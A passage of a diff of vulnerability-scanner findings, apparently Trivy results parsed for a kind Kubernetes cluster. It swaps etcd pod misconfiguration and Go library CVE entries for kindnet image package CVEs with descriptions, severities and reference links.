"https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "https://access.redhat.com/security/cve/CVE-2022-3219", + "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "https://dev.gnupg.org/D556", + "https://dev.gnupg.org/T5993", + "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "https://security.netapp.com/advisory/ntap-20230324-0001/", + "https://www.cve.org/CVERecord?id=CVE-2022-3219", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "denial of service issue (resource consumption) using compressed packets", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", + "value": "https://avd.aquasec.com/nvd/cve-2022-3219", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "value": "https://access.redhat.com/security/cve/CVE-2022-3219", }, { "type": "URL", - "value": "https://go.dev/cl/340830", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", }, { "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://dev.gnupg.org/D556", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://dev.gnupg.org/T5993", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": "1.9-3+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "1.9-3", + "packageName": "gzip", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "arbitrary-file-write vulnerability", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://security.gentoo.org/glsa/202209-01", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'etcd' of Pod 'etcd-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'etcd-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "iptables", "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", ], }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, ], "severity": "LOW", @@ -76231,86 +78194,47 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "iptables", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'etcd-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, ], "severity": "LOW", @@ -76318,10 +78242,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2011-3374", - "installedVersion": "2.2.4", - "packageName": "apt", + "installedVersion": "1.8.2.2", + "packageName": "libapt-pkg5.0", "references": [ "https://access.redhat.com/security/cve/cve-2011-3374", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", @@ -76334,7 +78258,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", "references": [ @@ -76375,697 +78299,771 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "1:2.36.1-8+deb11u1", - "packageName": "bsdutils", + "fixedVersion": "1.0.6-9.2~deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3112-1", + "installedVersion": "1.0.6-9.2~deb10u1", + "packageName": "libbz2-1.0", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "bzip2 - bugfix update", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33574", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://access.redhat.com/security/cve/CVE-2021-33574", + "https://linux.oracle.com/cve/CVE-2021-33574.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210629-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "https://www.cve.org/CVERecord?id=CVE-2021-33574", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "glibc: mq_notify does not handle separately allocated thread attributes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2021-33574", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://access.redhat.com/security/cve/CVE-2021-33574", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202107-07", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-2781", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-35942", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "http://seclists.org/oss-sec/2016/q1/452", - "http://www.openwall.com/lists/oss-security/2016/02/28/2", - "http://www.openwall.com/lists/oss-security/2016/02/28/3", - "https://access.redhat.com/security/cve/CVE-2016-2781", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", - 